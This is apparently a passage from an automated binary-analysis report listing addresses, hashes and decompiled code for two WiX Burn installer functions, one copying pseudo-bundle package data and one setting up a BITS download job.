                                                                                                                                                                  0x004175d4
                                                                                                                                                                  0x004175d6
                                                                                                                                                                  0x004175dc
                                                                                                                                                                  0x004175de
                                                                                                                                                                  0x004175e1
                                                                                                                                                                  0x004175e4
                                                                                                                                                                  0x004175ee
                                                                                                                                                                  0x004175f1
                                                                                                                                                                  0x004175f6
                                                                                                                                                                  0x0041761b
                                                                                                                                                                  0x00417622
                                                                                                                                                                  0x00417629
                                                                                                                                                                  0x00417639
                                                                                                                                                                  0x00417676
                                                                                                                                                                  0x0041767f
                                                                                                                                                                  0x004176a2
                                                                                                                                                                  0x004176aa
                                                                                                                                                                  0x004176e1
                                                                                                                                                                  0x004176e9
                                                                                                                                                                  0x00417721
                                                                                                                                                                  0x00417728
                                                                                                                                                                  0x0041772c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004176fa
                                                                                                                                                                  0x00417730
                                                                                                                                                                  0x00417735
                                                                                                                                                                  0x0041773a
                                                                                                                                                                  0x0041773a
                                                                                                                                                                  0x0041773b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00417741
                                                                                                                                                                  0x0041770b
                                                                                                                                                                  0x00417711
                                                                                                                                                                  0x0041771b
                                                                                                                                                                  0x0041771b
                                                                                                                                                                  0x0041770b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041772e
                                                                                                                                                                  0x004176ac
                                                                                                                                                                  0x004176bd
                                                                                                                                                                  0x004176c7
                                                                                                                                                                  0x004176d5
                                                                                                                                                                  0x004176da
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004176da
                                                                                                                                                                  0x0041763b
                                                                                                                                                                  0x0041764c
                                                                                                                                                                  0x00417656
                                                                                                                                                                  0x00417664
                                                                                                                                                                  0x00417669
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041760e
                                                                                                                                                                  0x0041760e
                                                                                                                                                                  0x00417742
                                                                                                                                                                  0x0041774a
                                                                                                                                                                  0x00417756
                                                                                                                                                                  0x00417756

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClassErrorLast$CreateRegisterUnregisterValueWindow
                                                                                                                                                                  • String ID: Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$uithread.cpp
                                                                                                                                                                  • API String ID: 213125376-288575659
                                                                                                                                                                  • Opcode ID: 101192c76667ab78136ccdce1f3c1589fdb4f89c6da2b2d96756db9211e1dc29
                                                                                                                                                                  • Instruction ID: 71478628fef37dba516660fcaa9bf678e508b9e4fe64fdba20abbeff673eea67
                                                                                                                                                                  • Opcode Fuzzy Hash: 101192c76667ab78136ccdce1f3c1589fdb4f89c6da2b2d96756db9211e1dc29
                                                                                                                                                                  • Instruction Fuzzy Hash: BE41B132A04615AFEB109BA5DC48BDABBB8FF08350F204126FA14E7190D735A941CBE8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00422DE3, Relevance: 26.5, APIs: 1, Strings: 14, Instructions: 270COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 77%
                                                                                                                                                                  			E00422DE3(intOrPtr __ecx, void* __eflags, signed int _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				intOrPtr _t120;
				intOrPtr _t175;
				intOrPtr* _t189;
				intOrPtr* _t196;
				intOrPtr _t197;
				intOrPtr _t202;
				signed int _t205;
				intOrPtr _t206;
				intOrPtr _t207;
				signed int _t208;
				signed int _t209;
				signed int _t211;
				void* _t213;
				void* _t219;
				signed int _t222;
				intOrPtr* _t223;
				void* _t224;

				_t192 = __ecx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t189 = _a20;
				_t120 = E00431078( *(_t189 + 0x80) << 3, 1);
				_t211 = _a4;
				 *((intOrPtr*)(_t211 + 0x7c)) = _t120;
				if(_t120 != 0) {
					_t205 = 0;
					 *(_t211 + 0x80) =  *(_t189 + 0x80);
					_a4 = 0;
					if( *(_t189 + 0x80) <= 0) {
						L14:
						 *(_t211 + 0x14) =  *(_t211 + 0x14) & 0x00000000;
						 *((intOrPtr*)(_t211 + 0xa4)) = 1;
						 *((intOrPtr*)(_t211 + 0x8c)) =  *((intOrPtr*)(_t189 + 0x8c));
						 *((intOrPtr*)(_t211 + 0x40)) =  *((intOrPtr*)(_t189 + 0x40));
						 *((intOrPtr*)(_t211 + 0x44)) =  *((intOrPtr*)(_t189 + 0x44));
						 *((intOrPtr*)(_t211 + 0x28)) =  *((intOrPtr*)(_t189 + 0x28));
						 *((intOrPtr*)(_t211 + 0x2c)) =  *((intOrPtr*)(_t189 + 0x2c));
						 *((intOrPtr*)(_t211 + 0x30)) =  *((intOrPtr*)(_t189 + 0x30));
						 *((intOrPtr*)(_t211 + 0x34)) =  *((intOrPtr*)(_t189 + 0x34));
						 *((intOrPtr*)(_t211 + 0x1c)) =  *((intOrPtr*)(_t189 + 0x1c));
						if(E00433F88(_t211,  *_t189, 0) >= 0) {
							_t97 = _t211 + 0x24; // 0x2cc
							if(E00433F88(_t97,  *((intOrPtr*)(_t189 + 0x24)), 0) >= 0) {
								 *((intOrPtr*)(_t211 + 0xac)) =  *((intOrPtr*)(_t189 + 0xac));
								if(E00411C05(_t192,  &_v8,  *_a8,  *((intOrPtr*)(_a8 + 4)),  *((intOrPtr*)(_a8 + 8)),  *((intOrPtr*)(_a8 + 0x1c)), 1, _a16, _a12,  *((intOrPtr*)(_t134 + 0xc))) >= 0) {
									_t109 = _t211 + 0x94; // 0x33c
									if(E00433F88(_t109, _v8, 0) >= 0) {
										_t111 = _t211 + 0x98; // 0x340
										_t219 = E00433F88(_t111, _v8, 0);
										if(_t219 >= 0) {
											_t113 = _t211 + 0x9c; // 0x344
											 *((intOrPtr*)(_t211 + 0xa8)) = 1;
											_t219 = E00433F88(_t113, _v8, 0);
											if(_t219 >= 0) {
												 *((intOrPtr*)(_t211 + 0x18)) = 1;
											} else {
												_push("Failed to copy uninstall arguments for passthrough bundle package");
												goto L33;
											}
										} else {
											_push("Failed to copy related arguments for passthrough bundle package");
											goto L33;
										}
									} else {
										_push("Failed to copy install arguments for passthrough bundle package");
										goto L33;
									}
								} else {
									_push("Failed to recreate command-line arguments.");
									goto L33;
								}
							} else {
								_push("Failed to copy cache id for passthrough pseudo bundle.");
								goto L33;
							}
						} else {
							_push("Failed to copy key for passthrough pseudo bundle.");
							goto L33;
						}
					} else {
						while(1) {
							_t222 = _t205 << 3;
							_a20 =  *((intOrPtr*)(_t189 + 0x7c)) + _t222;
							 *((intOrPtr*)(_t222 +  *((intOrPtr*)(_t211 + 0x7c)))) = E00431078(0x58, 1);
							_t149 =  *((intOrPtr*)(_t211 + 0x7c));
							_t206 =  *((intOrPtr*)(_t222 +  *((intOrPtr*)(_t211 + 0x7c))));
							if(_t206 == 0) {
								break;
							}
							_t196 = _a20;
							 *((intOrPtr*)(_t206 + 4)) =  *((intOrPtr*)( *_t196 + 4));
							_t197 =  *_t196;
							_t207 =  *((intOrPtr*)(_t222 +  *((intOrPtr*)(_t211 + 0x7c))));
							 *((intOrPtr*)(_t207 + 0x10)) =  *((intOrPtr*)(_t197 + 0x10));
							 *((intOrPtr*)(_t207 + 0x14)) =  *((intOrPtr*)(_t197 + 0x14));
							_t219 = E00433F88( *((intOrPtr*)(_t222 +  *((intOrPtr*)(_t211 + 0x7c)))),  *((intOrPtr*)( *_a20)), 0);
							if(_t219 < 0) {
								_push("Failed to copy key for passthrough pseudo bundle payload.");
								goto L33;
							} else {
								_t219 = E00433F88( *((intOrPtr*)( *((intOrPtr*)(_t211 + 0x7c)) + _a4 * 8)) + 0x18,  *((intOrPtr*)( *_a20 + 0x18)), 0);
								if(_t219 < 0) {
									_push("Failed to copy filename for passthrough pseudo bundle.");
									goto L33;
								} else {
									_t219 = E00433F88( *((intOrPtr*)( *((intOrPtr*)(_t211 + 0x7c)) + _a4 * 8)) + 0x38,  *((intOrPtr*)( *_a20 + 0x38)), 0);
									if(_t219 < 0) {
										_push("Failed to copy local source path for passthrough pseudo bundle.");
										goto L33;
									} else {
										_t223 = _a20;
										_t172 =  *_t223;
										if( *((intOrPtr*)( *_t223 + 0x40)) == 0) {
											L10:
											_t173 =  *_t223;
											if( *((intOrPtr*)( *_t223 + 0x30)) == 0) {
												L13:
												_t208 = _a4;
												_t192 =  *((intOrPtr*)(_t211 + 0x7c));
												 *((intOrPtr*)( *((intOrPtr*)(_t211 + 0x7c)) + 4 + _t208 * 8)) =  *((intOrPtr*)(_t223 + 4));
												_t205 = _t208 + 1;
												_a4 = _t205;
												if(_t205 <  *(_t189 + 0x80)) {
													continue;
												} else {
													goto L14;
												}
											} else {
												_t175 = E00431078( *((intOrPtr*)(_t173 + 0x34)), 0);
												_t209 = _a4;
												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t211 + 0x7c)) + _t209 * 8)) + 0x30)) = _t175;
												_t176 =  *((intOrPtr*)(_t211 + 0x7c));
												_t202 =  *((intOrPtr*)( *((intOrPtr*)(_t211 + 0x7c)) + _t209 * 8));
												if( *((intOrPtr*)(_t202 + 0x30)) == 0) {
													_t213 = 0x8007000e;
													_t219 = 0x8007000e;
													E004300D9(_t176, "pseudobundle.cpp", 0xcf, 0x8007000e);
													_push("Failed to allocate memory for pseudo bundle payload hash.");
													goto L18;
												} else {
													 *((intOrPtr*)(_t202 + 0x34)) =  *((intOrPtr*)( *_t223 + 0x34));
													E00426F91( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t211 + 0x7c)) + _t209 * 8)) + 0x30)),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t211 + 0x7c)) + _t209 * 8)) + 0x34)),  *((intOrPtr*)( *_t223 + 0x30)),  *((intOrPtr*)( *_t223 + 0x34)));
													_t224 = _t224 + 0x10;
													goto L13;
												}
											}
										} else {
											_t219 = E00433F88( *((intOrPtr*)( *((intOrPtr*)(_t211 + 0x7c)) + _a4 * 8)) + 0x40,  *((intOrPtr*)(_t172 + 0x40)), 0);
											if(_t219 < 0) {
												_push("Failed to copy download source for passthrough pseudo bundle.");
												L33:
												_push(_t219);
												goto L34;
											} else {
												_t223 = _a20;
												goto L10;
											}
										}
									}
								}
							}
							goto L36;
						}
						_t213 = 0x8007000e;
						_t219 = 0x8007000e;
						E004300D9(_t149, "pseudobundle.cpp", 0xb9, 0x8007000e);
						_push("Failed to allocate space for burn payload inside of related bundle struct");
						goto L18;
					}
				} else {
					_t213 = 0x8007000e;
					_t219 = 0x8007000e;
					E004300D9(_t120, "pseudobundle.cpp", 0xb1, 0x8007000e);
					_push("Failed to allocate space for burn package payload inside of passthrough bundle.");
					L18:
					_push(_t213);
					L34:
					E00430A57();
				}
				L36:
				if(_v8 != 0) {
					E004380AB(_v8);
				}
				return _t219;
			}





















                                                                                                                                                                  0x00422de3
                                                                                                                                                                  0x00422de6
                                                                                                                                                                  0x00422de7
                                                                                                                                                                  0x00422dec
                                                                                                                                                                  0x00422dfd
                                                                                                                                                                  0x00422e02
                                                                                                                                                                  0x00422e05
                                                                                                                                                                  0x00422e0a
                                                                                                                                                                  0x00422e33
                                                                                                                                                                  0x00422e35
                                                                                                                                                                  0x00422e3b
                                                                                                                                                                  0x00422e44
                                                                                                                                                                  0x00422f9b
                                                                                                                                                                  0x00422f9b
                                                                                                                                                                  0x00422f9f
                                                                                                                                                                  0x00422faf
                                                                                                                                                                  0x00422fb8
                                                                                                                                                                  0x00422fbe
                                                                                                                                                                  0x00422fc4
                                                                                                                                                                  0x00422fca
                                                                                                                                                                  0x00422fd0
                                                                                                                                                                  0x00422fd6
                                                                                                                                                                  0x00422fde
                                                                                                                                                                  0x00422fed
                                                                                                                                                                  0x00423066
                                                                                                                                                                  0x00423073
                                                                                                                                                                  0x00423085
                                                                                                                                                                  0x004230b1
                                                                                                                                                                  0x004230c0
                                                                                                                                                                  0x004230d0
                                                                                                                                                                  0x004230dd
                                                                                                                                                                  0x004230e9
                                                                                                                                                                  0x004230ed
                                                                                                                                                                  0x004230fa
                                                                                                                                                                  0x00423101
                                                                                                                                                                  0x00423110
                                                                                                                                                                  0x00423114
                                                                                                                                                                  0x00423125
                                                                                                                                                                  0x00423116
                                                                                                                                                                  0x00423116
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00423116
                                                                                                                                                                  0x004230ef
                                                                                                                                                                  0x004230ef
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004230ef
                                                                                                                                                                  0x004230d2
                                                                                                                                                                  0x004230d2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004230d2
                                                                                                                                                                  0x004230b3
                                                                                                                                                                  0x004230b3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004230b3
                                                                                                                                                                  0x00423075
                                                                                                                                                                  0x00423075
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00423075
                                                                                                                                                                  0x00422fef
                                                                                                                                                                  0x00422fef
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422fef
                                                                                                                                                                  0x00422e4a
                                                                                                                                                                  0x00422e4a
                                                                                                                                                                  0x00422e4f
                                                                                                                                                                  0x00422e58
                                                                                                                                                                  0x00422e63
                                                                                                                                                                  0x00422e66
                                                                                                                                                                  0x00422e69
                                                                                                                                                                  0x00422e6e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422e74
                                                                                                                                                                  0x00422e7e
                                                                                                                                                                  0x00422e84
                                                                                                                                                                  0x00422e86
                                                                                                                                                                  0x00422e8c
                                                                                                                                                                  0x00422e92
                                                                                                                                                                  0x00422ea7
                                                                                                                                                                  0x00422eab
                                                                                                                                                                  0x00423039
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422eb1
                                                                                                                                                                  0x00422ecd
                                                                                                                                                                  0x00422ed1
                                                                                                                                                                  0x0042302f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422ed7
                                                                                                                                                                  0x00422ef3
                                                                                                                                                                  0x00422ef7
                                                                                                                                                                  0x00423025
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422efd
                                                                                                                                                                  0x00422efd
                                                                                                                                                                  0x00422f00
                                                                                                                                                                  0x00422f06
                                                                                                                                                                  0x00422f2c
                                                                                                                                                                  0x00422f2c
                                                                                                                                                                  0x00422f32
                                                                                                                                                                  0x00422f7e
                                                                                                                                                                  0x00422f7e
                                                                                                                                                                  0x00422f81
                                                                                                                                                                  0x00422f87
                                                                                                                                                                  0x00422f8b
                                                                                                                                                                  0x00422f8c
                                                                                                                                                                  0x00422f95
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422f34
                                                                                                                                                                  0x00422f39
                                                                                                                                                                  0x00422f41
                                                                                                                                                                  0x00422f47
                                                                                                                                                                  0x00422f4a
                                                                                                                                                                  0x00422f4d
                                                                                                                                                                  0x00422f54
                                                                                                                                                                  0x00423003
                                                                                                                                                                  0x00423013
                                                                                                                                                                  0x00423015
                                                                                                                                                                  0x0042301a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422f5a
                                                                                                                                                                  0x00422f5f
                                                                                                                                                                  0x00422f76
                                                                                                                                                                  0x00422f7b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422f7b
                                                                                                                                                                  0x00422f54
                                                                                                                                                                  0x00422f08
                                                                                                                                                                  0x00422f1f
                                                                                                                                                                  0x00422f23
                                                                                                                                                                  0x00422ff9
                                                                                                                                                                  0x0042311b
                                                                                                                                                                  0x0042311b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422f29
                                                                                                                                                                  0x00422f29
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422f29
                                                                                                                                                                  0x00422f23
                                                                                                                                                                  0x00422f06
                                                                                                                                                                  0x00422ef7
                                                                                                                                                                  0x00422ed1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422eab
                                                                                                                                                                  0x00423043
                                                                                                                                                                  0x00423053
                                                                                                                                                                  0x00423055
                                                                                                                                                                  0x0042305a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042305a
                                                                                                                                                                  0x00422e0c
                                                                                                                                                                  0x00422e0c
                                                                                                                                                                  0x00422e1c
                                                                                                                                                                  0x00422e1e
                                                                                                                                                                  0x00422e23
                                                                                                                                                                  0x0042301f
                                                                                                                                                                  0x0042301f
                                                                                                                                                                  0x0042311c
                                                                                                                                                                  0x0042311c
                                                                                                                                                                  0x00423122
                                                                                                                                                                  0x0042312c
                                                                                                                                                                  0x00423130
                                                                                                                                                                  0x00423135
                                                                                                                                                                  0x00423135
                                                                                                                                                                  0x00423140

                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to copy key for passthrough pseudo bundle payload., xrefs: 00423039
                                                                                                                                                                  • Failed to allocate space for burn package payload inside of passthrough bundle., xrefs: 00422E23
                                                                                                                                                                  • pseudobundle.cpp, xrefs: 00422E17, 0042300E, 0042304E
                                                                                                                                                                  • Failed to copy download source for passthrough pseudo bundle., xrefs: 00422FF9
                                                                                                                                                                  • Failed to copy related arguments for passthrough bundle package, xrefs: 004230EF
                                                                                                                                                                  • Failed to copy local source path for passthrough pseudo bundle., xrefs: 00423025
                                                                                                                                                                  • Failed to copy uninstall arguments for passthrough bundle package, xrefs: 00423116
                                                                                                                                                                  • Failed to copy filename for passthrough pseudo bundle., xrefs: 0042302F
                                                                                                                                                                  • Failed to allocate space for burn payload inside of related bundle struct, xrefs: 0042305A
                                                                                                                                                                  • Failed to allocate memory for pseudo bundle payload hash., xrefs: 0042301A
                                                                                                                                                                  • Failed to copy cache id for passthrough pseudo bundle., xrefs: 00423075
                                                                                                                                                                  • Failed to copy install arguments for passthrough bundle package, xrefs: 004230D2
                                                                                                                                                                  • Failed to recreate command-line arguments., xrefs: 004230B3
                                                                                                                                                                  • Failed to copy key for passthrough pseudo bundle., xrefs: 00422FEF
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$AllocProcess
                                                                                                                                                                  • String ID: Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of passthrough bundle.$Failed to allocate space for burn payload inside of related bundle struct$Failed to copy cache id for passthrough pseudo bundle.$Failed to copy download source for passthrough pseudo bundle.$Failed to copy filename for passthrough pseudo bundle.$Failed to copy install arguments for passthrough bundle package$Failed to copy key for passthrough pseudo bundle payload.$Failed to copy key for passthrough pseudo bundle.$Failed to copy local source path for passthrough pseudo bundle.$Failed to copy related arguments for passthrough bundle package$Failed to copy uninstall arguments for passthrough bundle package$Failed to recreate command-line arguments.$pseudobundle.cpp
                                                                                                                                                                  • API String ID: 1617791916-115096447
                                                                                                                                                                  • Opcode ID: e10a3cb1ffaf961182af13acff6fb8a5286bea6ff330845449bcc651a40e2e58
                                                                                                                                                                  • Instruction ID: 092d0e0dfaecddaf412aebfac507c950904cc4396fa7d777170af1d30e108291
                                                                                                                                                                  • Opcode Fuzzy Hash: e10a3cb1ffaf961182af13acff6fb8a5286bea6ff330845449bcc651a40e2e58
                                                                                                                                                                  • Instruction Fuzzy Hash: C5B15635B00625EFDB11CF28C881F59BBB1BB08315F51815AF904AB3A2C779ED61DB98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00426408, Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 202stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 60%
                                                                                                                                                                  			E00426408(void* __edx, intOrPtr _a4, WCHAR** _a8, intOrPtr _a12) {
				void* _v8;
				char _v12;
				void* _v16;
				void* __esi;
				void* _t51;
				intOrPtr* _t83;
				short _t84;
				short _t85;
				short _t86;
				void* _t95;
				intOrPtr* _t97;
				void* _t99;
				WCHAR** _t102;
				intOrPtr _t103;

				_t95 = __edx;
				_t96 = _a8;
				_v8 = 0;
				_t83 = 0;
				_v16 = 0;
				_v12 = 0;
				if(lstrlenW( *_a8) >= 8) {
					_t99 = E00433F88( &_v8,  *_t96, 0);
					if(_t99 >= 0) {
						_t84 = 0x68;
						 *_v8 = _t84;
						_t85 = 0x74;
						 *((short*)(_v8 + 2)) = _t85;
						 *((short*)(_v8 + 4)) = _t85;
						_t86 = 0x70;
						 *((short*)(_v8 + 6)) = _t86;
						_t51 = E00425F1D(_t95,  &_v16);
						_t97 = _v16;
						if(_t51 >= 0) {
							if(E004262DE(_t97, _a8[1], _a8[2]) >= 0) {
								_t102 =  *((intOrPtr*)( *_t97 + 0x10))(_t97, _v8, _a12);
								_a8 = _t102;
								if(_t102 >= 0) {
									if(E00428F67(0x30) == 0) {
										_t83 = 0;
									} else {
										_t56 = E00425E55(_t56, _a4,  &_a8);
										_t102 = _a8;
										_t83 = _t56;
									}
									if(_t83 != 0) {
										if(_t102 >= 0) {
											_t103 =  *((intOrPtr*)( *_t97 + 0x64))(_t97, _t83);
											if(_t103 >= 0) {
												while(1) {
													_v12 = 0;
													 *((intOrPtr*)(_t83 + 0x24)) = 0;
													 *((intOrPtr*)(_t83 + 0x20)) = 0;
													ResetEvent( *(_t83 + 0x28));
													_t103 =  *((intOrPtr*)( *_t97 + 0x1c))(_t97);
													if(_t103 < 0) {
														break;
													}
													_t90 = _t83;
													_t103 = E00426382(_t83);
													if(_t103 < 0) {
														_push("Failed while waiting for BITS download.");
														goto L31;
													}
													_t103 =  *((intOrPtr*)(_t83 + 0x24));
													if(_t103 == 0x80070642) {
														goto L32;
													}
													if(_t103 < 0) {
														E004261F2(_t90, _t103, _a4, _t97, _t103,  *((intOrPtr*)(_t83 + 0x20)),  &_v12);
													}
													if(_v12 != 0) {
														continue;
													} else {
														if(_t103 >= 0) {
															_t103 =  *((intOrPtr*)( *_t97 + 0x24))(_t97);
															if(_t103 >= 0) {
																goto L32;
															}
															_push("Failed to complete BITS job.");
															goto L31;
														}
														_push("Failed to download BITS job.");
														goto L31;
													}
												}
												_push("Falied to start BITS job.");
												goto L31;
											}
											_push("Failed to set callback interface for BITS job.");
											goto L31;
										}
										_push("Failed to initialize BITS job callback.");
										goto L31;
									} else {
										_t103 = 0x8007000e;
										E004300D9(_t56, "bitsengine.cpp", 0x14c, 0x8007000e);
										_push("Failed to create BITS job callback.");
										L31:
										_push(_t103);
										E00430A57();
										L32:
										if(_t97 != 0) {
											 *((intOrPtr*)( *_t97 + 0x64))(_t97, 0);
											if(_t103 < 0) {
												 *((intOrPtr*)( *_t97 + 0x20))(_t97);
											}
										}
										if(_t83 != 0) {
											 *((intOrPtr*)( *_t83 + 8))(_t83);
										}
										if(_t97 != 0) {
											 *((intOrPtr*)( *_t97 + 8))(_t97);
										}
										goto L39;
									}
								}
								_push("Failed to add file to BITS job.");
								goto L31;
							}
							_push("Failed to set credentials for BITS job.");
							goto L31;
						}
						_push("Failed to create BITS job.");
						goto L31;
					}
					_push("Failed to copy download URL.");
					_push(_t99);
					E00430A57();
					goto L39;
				} else {
					_t103 = 0x80070057;
					E004300D9(_t43, "bitsengine.cpp", 0x134, 0x80070057);
					E00430A57(0x80070057, "Invalid BITS engine URL: %ls",  *_t96);
					L39:
					if(_v8 != 0) {
						E004380AB(_v8);
					}
					return _t103;
				}
			}

















                                                                                                                                                                  0x00426408
                                                                                                                                                                  0x00426411
                                                                                                                                                                  0x00426418
                                                                                                                                                                  0x0042641b
                                                                                                                                                                  0x0042641d
                                                                                                                                                                  0x00426420
                                                                                                                                                                  0x0042642c
                                                                                                                                                                  0x00426464
                                                                                                                                                                  0x00426468
                                                                                                                                                                  0x00426481
                                                                                                                                                                  0x00426482
                                                                                                                                                                  0x0042648a
                                                                                                                                                                  0x0042648b
                                                                                                                                                                  0x00426494
                                                                                                                                                                  0x0042649b
                                                                                                                                                                  0x0042649c
                                                                                                                                                                  0x004264a4
                                                                                                                                                                  0x004264a9
                                                                                                                                                                  0x004264b0
                                                                                                                                                                  0x004264cf
                                                                                                                                                                  0x004264e7
                                                                                                                                                                  0x004264e9
                                                                                                                                                                  0x004264ee
                                                                                                                                                                  0x00426504
                                                                                                                                                                  0x0042651b
                                                                                                                                                                  0x00426506
                                                                                                                                                                  0x0042650f
                                                                                                                                                                  0x00426514
                                                                                                                                                                  0x00426517
                                                                                                                                                                  0x00426517
                                                                                                                                                                  0x0042651f
                                                                                                                                                                  0x00426542
                                                                                                                                                                  0x00426555
                                                                                                                                                                  0x00426559
                                                                                                                                                                  0x00426562
                                                                                                                                                                  0x00426564
                                                                                                                                                                  0x0042656a
                                                                                                                                                                  0x0042656d
                                                                                                                                                                  0x00426570
                                                                                                                                                                  0x0042657c
                                                                                                                                                                  0x00426580
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00426582
                                                                                                                                                                  0x00426589
                                                                                                                                                                  0x0042658d
                                                                                                                                                                  0x004265d3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004265d3
                                                                                                                                                                  0x0042658f
                                                                                                                                                                  0x00426598
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042659c
                                                                                                                                                                  0x004265aa
                                                                                                                                                                  0x004265aa
                                                                                                                                                                  0x004265b3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004265b5
                                                                                                                                                                  0x004265b7
                                                                                                                                                                  0x004265c6
                                                                                                                                                                  0x004265ca
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004265cc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004265cc
                                                                                                                                                                  0x004265b9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004265b9
                                                                                                                                                                  0x004265b3
                                                                                                                                                                  0x004265da
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004265da
                                                                                                                                                                  0x0042655b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042655b
                                                                                                                                                                  0x00426544
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00426521
                                                                                                                                                                  0x00426521
                                                                                                                                                                  0x00426531
                                                                                                                                                                  0x00426536
                                                                                                                                                                  0x004265df
                                                                                                                                                                  0x004265df
                                                                                                                                                                  0x004265e0
                                                                                                                                                                  0x004265e7
                                                                                                                                                                  0x004265e9
                                                                                                                                                                  0x004265f0
                                                                                                                                                                  0x004265f5
                                                                                                                                                                  0x004265fa
                                                                                                                                                                  0x004265fa
                                                                                                                                                                  0x004265f5
                                                                                                                                                                  0x004265ff
                                                                                                                                                                  0x00426604
                                                                                                                                                                  0x00426604
                                                                                                                                                                  0x00426609
                                                                                                                                                                  0x0042660e
                                                                                                                                                                  0x0042660e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00426609
                                                                                                                                                                  0x0042651f
                                                                                                                                                                  0x004264f0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004264f0
                                                                                                                                                                  0x004264d1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004264d1
                                                                                                                                                                  0x004264b2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004264b2
                                                                                                                                                                  0x0042646a
                                                                                                                                                                  0x0042646f
                                                                                                                                                                  0x00426470
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042642e
                                                                                                                                                                  0x0042642e
                                                                                                                                                                  0x0042643e
                                                                                                                                                                  0x0042644b
                                                                                                                                                                  0x00426611
                                                                                                                                                                  0x00426615
                                                                                                                                                                  0x0042661a
                                                                                                                                                                  0x0042661a
                                                                                                                                                                  0x00426625
                                                                                                                                                                  0x00426625

                                                                                                                                                                  APIs
                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,004201B3,75C08550,?,?,00000000,?,?,?,00000001,00000000,?), ref: 00426423
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to download BITS job., xrefs: 004265B9
